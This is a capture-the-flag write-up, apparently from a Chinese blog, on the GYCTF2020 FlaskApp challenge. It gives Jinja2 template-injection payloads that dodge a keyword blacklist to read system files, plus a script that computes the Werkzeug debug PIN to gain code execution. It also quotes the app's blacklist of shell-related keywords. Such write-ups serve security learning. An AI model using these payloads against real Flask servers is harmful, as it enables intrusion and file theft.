[GYCTF2020]FlaskApp

最新推荐文章于 2024-07-13 16:30:52 发布
最新推荐文章于 2024-07-13 16:30:52 发布
阅读量2.1k 收藏 13
点赞数 9
分类专栏: CTF刷题记录 文章标签: CTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/117773638
版权

知识点:flask框架开启debug模式产生的漏洞,PIN码的产生过程和文件读取,字符串拼接绕过,倒序绕过过滤。

目录

题目分析

非预期解

可以使用字符串拼接进行绕过

倒转输出

预期解

 生成PIN码

 传入PIN码,终端RCE

参考链接

题目分析

首先,打开题目,是是一个base64加密和解密的界面

查看hint,有两个地方需要注意

  1. 失败是成功之母,在解密出错的时候,出错会debug
  2. f12中显示PIN

接下来说说这个题目的解法

非预期解

本题目存在SSTI

 加密 {{7+7}}
 e3s3Kzd9fQ== 
 解密
 回显14  说明是SSTI

查看根目录:

 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}

测试,返回no no no ,说明存在waf

可能被过滤了关键字符,但是我们不知道关键字符,所以要读取一下源码app.py(直接用open)

 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}

测试,返回waf,能看到黑名单black_list

整理:看到flag,os,popen等被过滤

 def waf(str):
 black_list = ["flag","os","system","popen","import","eval","chr","request",
 "subprocess","commands","socket","hex","base64","*","?"]
 for x in black_list :
 if x in str.lower() :
 return 1

可以使用字符串拼接进行绕过

import = imp + ort         os =o+s

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

加密,解密之后得到根目录文件

发现this_is_the_flag.txt,继续进行读取,payload1:

 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}

加密解密,得到flag

倒转输出

使用切片的形式,简单测试一下,使用[::-1]既可以倒序输出全部,这样就可以绕过过滤

payload2:

 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read()}}{% endif %}{% endfor %}

同样可以得到flag

预期解

文件包含,PIN码生成

关于PIN码的相关资料请参考:Flask debug 模式 PIN 码生成机制安全性研究笔记

得到PIN码需要六个信息,其中2和3易知

  1. flask所登录的用户名
  2. modname,一般是flask.app
  3. getattr(app, “name”, app.class.name)。一般为Flask
  4. flask库下app.py的绝对路径。这个可以由报错信息看出
  5. 当前网络的mac地址的十进制数。
  6. 机器的id。

1. flask用户名可以通过读取/etc/passwd来知道

 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read() }}{% endif %}{% endfor %}

结果:知道用户名为flaskweb

2.  app.py的绝对路径,可从报错信息得到

/usr/local/lib/python3.7/site-packages/flask/app.py

3. mac地址的十进制数

首先要得到网卡 /sys/class/net/eth0/address

 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address','r').read() }}{% endif %}{% endfor %}

mac地址

 02:42:ac:10:93:07
将:去掉
0242ac109307
在python中进行转化
print(int('0242ac109307',16))
​得到
2485377864455

4. docker机器的id

 

引用大佬的解释:

对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件。

对于docker机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id,

 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/proc/self/cgroup','r').read() }}{% endif %}{% endfor %}

得到docker机器id,也就是1:name=systemd:/docker/之后的字符串

 生成PIN码

巨佬的代码

 import hashlib
 from itertools import chain
 probably_public_bits = [
     'flaskweb'# username
     'flask.app',# modname
     'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
     '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
 ]
 ​
 private_bits = [
     '2485377864455',# str(uuid.getnode()),  /sys/class/net/ens33/address
     'ad4fc7650590f81ec6ab4e3a40f284a6b5a75454fcb50d6ee5347eba94a124c8'# get_machine_id(), /etc/machine-id
 ]
 ​
 h = hashlib.md5()
 for bit in chain(probably_public_bits, private_bits):
     if not bit:
         continue
     if isinstance(bit, str):
         bit = bit.encode('utf-8')
     h.update(bit)
 h.update(b'cookiesalt')
 ​
 cookie_name = '__wzd' + h.hexdigest()[:20]
 ​
 num = None
 if num is None:
     h.update(b'pinsalt')
     num = ('%09d' % int(h.hexdigest(), 16))[:9]
 ​
 rv =None
 if rv is None:
     for group_size in 5, 4, 3:
         if len(num) % group_size == 0:
             rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                           for x in range(0, len(num), group_size))
             break
     else:
         rv = num
 ​
 print(rv)
 ​

PIN码的结果是:

 199-196-476

 传入PIN码,终端RCE

然后在报错的界面,点击窗口栏,输入PIN

输入PIN码

终端shell

得到flag

参考链接

1. [GYCTF2020]FlaskApp

2. Flask debug 模式 PIN 码生成机制安全性研究笔记

3. 服务端模板注入攻击

Sk1y
关注
专栏目录
[GYCTF2020]FlaskApp 1(SSTI,PIN)
weixin_45577185的博客
10-20 1315
f12发现了提示,但是我对PIN没有了解所以没反应过来 扫了一下网站,发现了一个网站打开 非预期解: 本题存在SSTI注入 加密 {{7+7}} e3s3Kzd9fQ== 解密 回显14 说明是SSTI python-Flask模版注入攻击SSTI(python沙盒逃逸) 查看根目录: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_
[GYCTF2020]FlaskApp (pin码,jinja2绕过注入)
最新发布
weixin_73399382的博客
07-31 1198
对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件,windows的id获取跟linux也不同。PIN 机制在 [Flask debug 模式 PIN 码生成机制安全性研究笔记](https://www.cnblogs.com/HacTF/p/8160076.html) 一文中有详细的研究。我是在/etc/machine-id下找到的,也就是第三个payload。
GYCTF2020 FlaskApp
汗的博客
09-04 1762
GYCTF2020 FlaskApp,老规矩,还是buu的平台 知识点 flask的SSTI ssti的绕过(拼接字符串,倒序切片,内置对象、函数) pin码的生成 信息收集 因为题目名flask,所以先不进行常规信息收集,而是观察功能点,寻找易发生ssti的功能 提示里貌似没有什么信息,考虑到功能异常抛出常见于解密环节,所以随便输段不能解密的 直接报错抛出debug信息,看来是开启了debug模式 参见该文章:Flask开启debug模式等于给黑客留了后门 而且读到了app.py的部分代码 大致的
[GYCTF2020]FlaskApp -wp
freerats的博客
08-19 525
打开后一个base64加密框 在解密处容易输入一些东西会导致报错,还会出一部分源码 @app.route('/decode',methods=['POST','GET']) def decode(): if request.values.get('text') : text = request.values.get("text") text_decode = base64.b64decode(text.encode()) tmp = "结.
Flask debug 模式生成pin码 + [GYCTF2020]FlaskApp
ShenZ的博客
09-07 3188
ssti的payload还是不太会写… Flask debug 模式生成pin码 计算pin所需要的值为: 1.flask所登录的用户名 2.modname 3.getattr(app, “name”, app.class.name) 4.flask库下app.py的绝对路径 5.当前网络的mac地址的十进制数 6.docker机器id 1.flask所登录的用户名 /etc/passwd 中找到用户名 {% for c in [].__class__.__base__.__subclasses__()
[GYCTF2020]FlaskApp 1
ubaichu的博客
07-13 808
[GYCTF2020]FlaskApp 1 详细解题过程
web buuctf [GYCTF2020]FlaskApp
weixin_44214568的博客
04-12 4350
知识点:1.flask的debug模式漏洞 2.flask字符拼接漏洞 1.开题 2.提示flask了,那不得不试一试SSTI 在加密内输入{{7*7}} ,生成base64码e3s3Kjd9fcKg; 将e3s3Kjd9fcKg输入到解码框内,显示no no no说明存在防御 换一个输入{{7+7}},base64码为e3s3Kzd9fQ==,解码后,显示的是14 综上存在SSTI 3.看提示页面,没啥东西,在解密页面(因为解密存在SSTI)再随便输入些字母,...
[GYCTF2020]FlaskApp1
2303_77961060的博客
05-09 367
在jinja2模板引擎当中存在下面几个模板,而在这些模板当中可以输入值以及一些控制语句,在jinja2引擎中有两个模板渲染函数,而SSTI注入的原因是由于。通过源代码的框架可以判断是FlaskFlask是使用python编写的一个轻量级的web应用框架,模板引擎使用的是jinja2,遵循MVC模型。可以看到返回有this_is_the_flag.txt,然后对其进行读取,构造。的不正确的使用以及没有对用户输入的数据进行有效的过滤导致的.构造{{config}},先加密,再把加密结果解密,结果输出。
int zx_spi_flash_init(void) { zx_err_t ret = ZX_EOK; GPIO_InitType GPIO_InitStructure; GPIO_StructInit(&GPIO_InitStructure); /* Configure flash_vcc pin PowerOn */ RCC_APB2PeriphClockCmd(SPI_FLASH_VCC_CTR_GPIO_RCC, ENABLE); GPIO_InitStructure.GPIO_Mode = GPIO_Mode_OUT_PP; GPIO_InitStructure.GPIO_Pins = SPI_FLASH_PIN_VCC_CTR; #if(ZC_HARDWARE_BOARD) GPIO_ResetBits(SPI_FLASH_VCC_CTR_GPIO, SPI_FLASH_PIN_VCC_CTR); #else GPIO_SetBits(SPI_FLASH_VCC_CTR_GPIO, SPI_FLASH_PIN_VCC_CTR); #endif /* Configure CS pin as Output Pullup */ RCC_APB2PeriphClockCmd(SPI_FLASH_NSS_GPIO_RCC, ENABLE); GPIO_InitStructure.GPIO_Mode = GPIO_Mode_OUT_PP; GPIO_InitStructure.GPIO_Pins = SPI_FLASH_PIN_NSS; GPIO_Init(SPI_FLASH_NSS_GPIO, &GPIO_InitStructure); GPIO_SetBits(SPI_FLASH_NSS_GPIO, SPI_FLASH_PIN_NSS); ret = drv_spi_bus_register(SPI_FLASH, ZX_SPI_FLASH_BUS); spi_flash_cs.GPIOx = SPI_FLASH_NSS_GPIO; spi_flash_cs.GPIO_Pin = SPI_FLASH_PIN_NSS; zx_spi_bus_attach_device(&spi_flash_device_10, SPI_FLASH_DEVICE_NAME, ZX_SPI_FLASH_BUS, (void *)&spi_flash_cs); spi_flash_device = zx_device_find(SPI_FLASH_DEVICE_NAME); zx_device_open(spi_flash_device, ZX_DEVICE_FLAG_RDWR); spi_flash_d = (struct zx_spi_device *)spi_flash_device; { struct zx_spi_configuration cfg; cfg.data_width = 8; cfg.mode = ZX_SPI_MASTER | ZX_SPI_MODE_3 | ZX_SPI_MSB; cfg.max_hz = 30 * 1000 * 1000; zx_spi_configure(spi_flash_d, &cfg); } /* config spi */ return ret; }解释一下
06-09
这段代码是一个函数,用于初始化SPI闪存设备。在函数中,使用GPIO_InitStructure结构体来配置GPIO口的参数,包括模式、引脚等。通过RCC_APB2PeriphClockCmd函数,开启SPI_FLASH_VCC_CTR_GPIO_RCC和SPI_FLASH_NSS_GPIO_RCC的时钟。然后分别设置SPI_FLASH_PIN_VCC_CTR和SPI_FLASH_PIN_NSS引脚的输出模式,其中SPI_FLASH_PIN_VCC_CTR被设置为输出低电平,SPI_FLASH_PIN_NSS被设置为输出高电平。接着,调用drv_spi_bus_register函数来注册SPI_FLASH设备,并通过zx_spi_bus_attach_device函数将设备与总线连接。最后,通过zx_spi_configure函数配置SPI设备的参数,包括数据宽度、模式和频率等。函数返回值为ret。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值